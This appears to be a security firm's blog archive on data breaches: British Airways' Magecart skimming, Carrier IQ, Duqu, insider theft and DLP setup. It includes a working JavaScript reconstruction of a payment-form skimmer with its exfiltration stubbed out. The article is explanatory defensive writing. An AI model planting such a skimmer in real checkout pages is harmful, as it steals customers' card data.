Archive for category Data Leakage

British Airways faces Data Breach of 380,000 Accounts

Malicious JavaScript code was planted on British Airways' website, leading to a data breach of around 380,000 accounts.

RELEASE DATE: September 14th, 2018

INCIDENT

Starting from August 21st, around 380,000 accounts were compromised in a major data breach at British Airways, exposing customers' information. The cybersecurity firm RiskIQ believes that the Magecart attackers, who were previously associated with the Ticketmaster UK breach earlier this year, were behind this breach as well.

The attackers obtained names, street and email addresses, credit card numbers, expiry dates and security codes (CVVs) of the airline's customers. Together these are enough for fraudulent card-not-present transactions against those customers.

British Airways stated that all payment information processed through the airline's website and mobile app between August 21st and September 5th had been exposed.

ATTACK VECTOR

The evidence reveals that malicious JavaScript code had been planted on British Airways' website.

Magecart has traditionally stolen data by injecting a malicious script into payment forms, so that card details are copied from the form as it is submitted rather than taken from a database afterwards.

RiskIQ further reported that the attackers used only 22 lines of code to capture the data (attached below).

The attack compromised British Airways' own web server, where the script was modified, rather than a third-party component; this makes it a highly targeted attack aimed at this particular website and its mobile application.

"This skimmer is attuned to how British Airways' payment page is set up, which tells us that the attackers carefully considered how to target this site in particular," said Yonathan Klijnsma, head researcher at RiskIQ.

ROOT CAUSE

Magecart's association with the attack was suspected because the attack is web-based and targets credit card data, the group's signature. The attackers studied the unique structure and functionality of the British Airways website and exploited its security lapses. RiskIQ crawls the scripts on the British Airways site and tracks how they change over time; during this process the researchers found a modified script on the compromised site.

The modified script was one of the BA site's own JavaScript libraries, and the injected code in that library called an API endpoint on a malicious web server at baways.com. That host is a virtual private server hosted by a provider in Lithuania, using a TLS certificate issued by Comodo on August 15 so that the connection would appear legitimate.

When a customer enters information on the website's payment form and clicks "submit", the 22 lines of code export the entered data to the malicious server as a JSON object.

The customer's transaction is not disturbed and still appears to take place over a secure session, while the attackers receive a full copy of the payment information. The attackers also added a "touchend" callback to the script, extending the attack to BA's mobile app, which loaded the same modified script.
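
To make the mechanism concrete, the following is an added example written for this article; it is not the 22-line skimmer from the British Airways site or RiskIQ's code. It reconstructs the pattern described above: hook the submit button's "click" (desktop) and "touchend" (mobile) events, serialise every field of the payment form to JSON, and hand the result to an exfiltration callback while the genuine submission continues. The form fields, the card values and the exfil callback are constructed for the demo; in the real attack that callback was an HTTP request to the attacker's server. It runs under Node, using the built-in EventTarget to stand in for the DOM button.

```javascript
"use strict";

// Constructed stand-in for the payment <form> and its <input> elements.
// The card number is the 4111... test PAN; nothing here is real data.
const paymentForm = {
  elements: [
    { name: "cardholderName", value: "Jane Doe" },
    { name: "cardNumber", value: "4111111111111111" },
    { name: "expiry", value: "12/21" },
    { name: "cvv", value: "123" },
    { name: "street", value: "1 Example Street" },
    { name: "email", value: "jane@example.com" },
  ],
};

// Walk every named input in the form and collect name/value pairs into one
// object. A real skimmer does this with form.querySelectorAll("input") and
// gets the same result.
function serializeFormFields(form) {
  const data = {};
  for (const el of form.elements) {
    if (el.name) data[el.name] = el.value;
  }
  return data;
}

// Install the hook on the submit button. Both "click" (desktop) and
// "touchend" (mobile) are bound, mirroring the callback that extended the
// attack to the app. `exfil` stands in for the HTTP POST of the JSON body to
// the attacker's collector; injecting it keeps this demo off the network.
function installSkimmer(form, submitButton, exfil) {
  const handler = () => {
    const payload = JSON.stringify(serializeFormFields(form));
    // No preventDefault() and no return value: the genuine submission still
    // goes ahead, so the customer sees a normal, successful transaction.
    exfil(payload);
  };
  submitButton.addEventListener("click", handler);
  submitButton.addEventListener("touchend", handler);
  return handler;
}

// Simulate a mobile customer tapping "submit" and return what the attacker
// would receive, decoded. Node's global EventTarget stands in for the button.
function simulateMobileCheckout() {
  const captured = [];
  const submitButton = new EventTarget();
  installSkimmer(paymentForm, submitButton, (body) => captured.push(body));
  submitButton.dispatchEvent(new Event("touchend"));
  return captured.map((body) => JSON.parse(body));
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(simulateMobileCheckout());
}
```

Run it with node and simulateMobileCheckout() returns the full card record the attacker would receive; note that nothing in the handler interferes with the form, which is why the customer never noticed.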

LESSON LEARNED

British Airways appears to have been operating without visibility into its Internet-facing web assets and the scripts they load. Without a baseline of what those scripts should contain, a modified library on the company's own server went unnoticed, and the compromise and data breach were not detected until it was too late.

With so many attack vectors and ever-evolving attack techniques, organizations should make sure that their security controls are implemented consistently. With proper measures, visibility into externally exposed assets and regular penetration testing, such attacks can be nipped in the bud before they cause damage.


Carrier IQ

Carrier IQ, also known as CIQ, is software installed on smartphones and tablets. It was developed to reduce the number of dropped calls, extend battery life and keep devices and services working efficiently, by giving operators a picture of the mobile user's actual experience. Operators want to improve their services continuously, and that is only possible if they know exactly when a mobile user is having a bad experience.

Historically, operators have used network-side data to solve problems, but today's networks and devices are too complex to understand without seeing the device itself. Carrier IQ examines a large amount of data from each device to capture and summarize what is working and what is not. For example, operators and device manufacturers need to know where exactly a call was dropped, which applications drained the device's battery and, most importantly, how to solve the user's problem when the user calls them.

According to Carrier IQ, its technology counts and summarizes problems; it does not provide keystroke logging or tracking tools. The company describes its technology as the user's advocate, because operators and handset manufacturers are, for the first time, getting an understanding of users' day-to-day problems.

Security researchers and developers, on the other hand, describe CIQ as low-level software installed by manufacturers such as Samsung and HTC at the request of the mobile carrier, for example AT&T. According to them, it records metrics such as every key pressed, every touch on the screen, every application launched, every website visited, traffic entering or leaving the phone, battery changes, and so on.

Carrier IQ calls this software the Mobile Intelligence Platform (MIP). CIQ works with manufacturers such as Samsung and HTC to embed the agent in the smartphone to collect this data. The biggest issue with CIQ is the threat to privacy, since the software behaves much like spyware.

Carrier IQ has recently attracted immense public attention. With growing concern over the threat to users' privacy, CIQ faces pressure not only from the general public but also from lawsuits filed against its software. Developers are coming up with ways of disabling the software so that users can control exactly what information they are willing to share.


The Mystery of Duqu

Duqu is a sophisticated piece of malware that was discovered on September 1st, 2011. Some experts claim that Duqu could only have been created by the creators of Stuxnet, because nobody else would have the source code needed to build malware so similar to Stuxnet yet serving an entirely different purpose. Three major similarities between Stuxnet and Duqu have come to attention: first, the signed components are signed with stolen certificates; second, like Stuxnet, Duqu uses a zero-day vulnerability to attack Windows systems; and third, the way Duqu is targeted requires advanced intelligence about its victims, again similar to Stuxnet.

A few weeks ago, Symantec researchers described how Duqu infects targeted computers. The malware hides in a Word document (.doc) sent to victims by email. Once the document is opened, it exploits a zero-day vulnerability in the Windows kernel to execute code and then infects the system by injecting into services.exe. The infected computers can then be remotely controlled by the attackers, who can spread the malware across the network and retrieve data in the process. Symantec issued a diagram summarizing the steps of the intrusion.

With this discovery, security researchers are now confident that Duqu is designed to target specific high-profile critical-infrastructure organizations via Word documents crafted to look legitimate. Symantec has identified six infected organizations in eight countries: Iran, Sudan, Vietnam, India, France, the Netherlands, Switzerland and Ukraine. Other experts have added identifications in Austria, Hungary, Indonesia and the United Kingdom.

If Duqu were to start attacking Pakistani networks, Pakistan would face a huge threat, regardless of the existing cyber conflict between Pakistan and India. Duqu is a far more powerful piece of malware: aimed at Pakistani networks, it could collect intelligence and assets from high-profile entities for the purpose of mounting a future attack, with little additional effort, against further third parties.

It remains to be seen whether the changes made by Microsoft will be sufficient to stem the problem; Microsoft has now patched the flaw exploited by Duqu. At present the source of Duqu has not been identified. Several measures can be taken to keep it off a system. Keeping backups of all existing data is important, but since Duqu is such powerful malware the best prevention is to protect and secure critical-infrastructure networks against such threats.

Moreover, a recent discovery shows that the Duqu operators have shut down all operations and cleaned up their command-and-control infrastructure, leaving security experts almost no evidence for further research. According to Kaspersky Lab, Duqu has been active since 2007 and was only publicly identified in October 2011, which means that several systems may have been infected with Duqu for years and may still be undetected.

A further discovery was that the Duqu operators undertook a global clean-up on October 20th, erasing traces of their activity going back to 2009 and leaving almost no evidence of their existence throughout those years. This shows that the attackers behind Duqu aimed to keep it secret, and as soon as word got out it was withdrawn. Even now the real command and control (C&C) servers behind Duqu remain undiscovered, which only shows the capability and resources of the attackers behind this malware.

Experts were also able to establish that the C&C servers were compromised by brute-forcing the root password over SSH rather than through the zero-day exploit that had been assumed; as soon as the attackers gained control of a server they upgraded OpenSSH 4.3 to version 5.8, which suggests that the newer version held some importance for them.


Fired Employees Leaving With More Than Just Experience

With rampant downsizing in most organizations, corporations now face new frontiers in their efforts to keep their data secure.

Uncertainty amongst employees leads to more dubious behaviour. With most of today's security products designed to counter external threats, how do you keep the EVIL WITHIN from jeopardizing your security and compromising the sanctity of your data?

Recent surveys conducted by (among others) Symantec and Ponemon indicate that the employee exodus has also resulted in large amounts of sensitive data leaking out. A survey of around a thousand participants revealed that an overwhelming majority of departing employees took a copy of their work with them. According to the survey, CDs remained the most popular means of sneaking data out, admitted to by 53% of participants; next in line were USB drives, used by another 43%, while 38% said they had used email.

While the more benign of the lot may just keep it as a part of their memories, the more enterprising may have other wily ideas.



A Matter of Trust

Another point commonly raised about DLP systems, usually by indignant employees, is "don't you trust us?"

It is necessary to explain that implementing a DLP does not imply a lack of trust in employees; in fact it is there to prevent accidental losses. Studies analysing recent data leakages indicate that the vast majority of disclosures are unintentional and can be attributed to a lack of awareness amongst employees. Most leakage scenarios can be traced back to lost USB storage devices or stolen laptops. Social networking sites, blogs and the increasing use of wikis are contributing to both accidental and intentional leakages.

It is in these scenarios that implementing a DLP starts to make sense: it stops bad practices before they can actually hurt.



Guidelines for Setting Up a DLP

Planning to set up a Data Leakage Prevention (DLP) system for your company? With DLP systems costing as much as they do, it is common for security managers to think of these new contraptions as the cure for all their headaches.

Before you attach too many expectations to your DLP, it is better to get an insight into what a DLP system is capable of, and more importantly what it is not capable of.

DLP is essentially targeted at risk reduction, not the outright elimination of threats. System administrators have to be careful about the nature of the controls they are deploying: misdirected policies are likely to raise either too many false alarms or too few.

Identify your sensitive areas and categorize possible threats based on your organizational structure. While it may not be very alarming for someone from HR to have a list of all your employees, the same list in the hands of someone from, say, the marketing department should be very alarming, and an attempt by anyone to copy or email that list should automatically trigger an alarm.

Hence, the simpler the policies, the more effectively your system reacts: for example, address employees' personal information in one rule, customer credentials in another, and pricing archives in yet another.

Once you have your policies defined, it is time to test them and make fine adjustments to optimize your response. One of the biggest hurdles to an effective DLP implementation is improperly defined user groups. In a system that relies heavily on your classification of users on the basis of their privileges, it is important to keep the directory structure as straightforward as possible.

And finally, one thing we cannot emphasize enough: test, test and retest your DLP configurations; only that will truly let you gauge the capability of your DLP installation.
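
As an added example of the rule layout recommended above (not any product's policy language), the block below encodes one simple rule per data class, classifies records by content, and evaluates constructed events for HR, marketing, payments and sales users. Card numbers are recognised with a Luhn check so that order and phone numbers do not trip the rule; the employee-list and pricing detectors are simple markers standing in for the document fingerprinting a real product would use. Group names, data classes, actions and the sample records are assumptions for the demo.

```javascript
"use strict";

// Luhn check: a 13-19 digit run only counts as a card number when its check
// digit is valid, which keeps order and phone numbers from raising alarms.
function luhnValid(digits) {
  let sum = 0;
  let doubleIt = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (doubleIt) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    doubleIt = !doubleIt;
  }
  return sum % 10 === 0;
}

// Content classification, one detector per data class. The employee-list and
// pricing detectors are stand-ins for a real product's document fingerprints.
function classify(content) {
  const classes = [];
  const candidates = content.match(/\b\d{13,19}\b/g) || [];
  if (candidates.some(luhnValid)) classes.push("customer-payment-card");
  if (/^employee_id,.*\b(salary|home_address)\b/m.test(content)) classes.push("employee-personal");
  if (/CONFIDENTIAL PRICING/.test(content)) classes.push("pricing-archive");
  return classes;
}

// One simple rule per data class, as the text recommends: who may handle the
// data at all, and which actions raise an alarm regardless of who performs them.
const rules = {
  "employee-personal":     { allowedGroups: ["hr"],       alertOnAction: ["copy", "email", "upload"] },
  "customer-payment-card": { allowedGroups: ["payments"], alertOnAction: ["copy", "email", "upload"] },
  "pricing-archive":       { allowedGroups: ["sales"],    alertOnAction: ["email", "upload"] },
};

function evaluate(event) {
  const reasons = [];
  for (const dataClass of classify(event.content)) {
    const rule = rules[dataClass];
    if (!rule) continue;
    if (rule.alertOnAction.includes(event.action)) {
      reasons.push(`${event.action} of ${dataClass} by anyone`);
    } else if (!rule.allowedGroups.includes(event.group)) {
      reasons.push(`${dataClass} handled by group ${event.group}`);
    }
  }
  return { verdict: reasons.length ? "alert" : "allow", reasons };
}

// Constructed sample events; the card number is the 4111... test PAN.
const employeeList = "employee_id,name,home_address,salary\n1001,A. Smith,1 High St,42000\n";
const sampleEvents = [
  { user: "hr-analyst", group: "hr",        action: "view",   content: employeeList },
  { user: "marketer",   group: "marketing", action: "view",   content: employeeList },
  { user: "hr-analyst", group: "hr",        action: "email",  content: employeeList },
  { user: "marketer",   group: "marketing", action: "email",  content: "Order 1234567890123456 shipped" },
  { user: "pay-ops",    group: "payments",  action: "upload", content: "refund card 4111111111111111" },
  { user: "sales-rep",  group: "sales",     action: "view",   content: "CONFIDENTIAL PRICING Q3\nwidget,9.99" },
];

function runSampleEvents() {
  return sampleEvents.map((e) => ({ user: e.user, action: e.action, ...evaluate(e) }));
}

if (typeof require !== "undefined" && require.main === module) {
  for (const result of runSampleEvents()) console.log(result);
}
```

The order number in the fourth event is sixteen digits but fails the Luhn check, so it is not classified and no alarm is raised; this is the kind of false positive the text warns about, and why the classifier, not the rule, is where most tuning effort goes. Each rule stays independent of the others, so a change to the pricing policy cannot accidentally loosen the employee-data rule.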



Copyright © Rewterz. All rights reserved.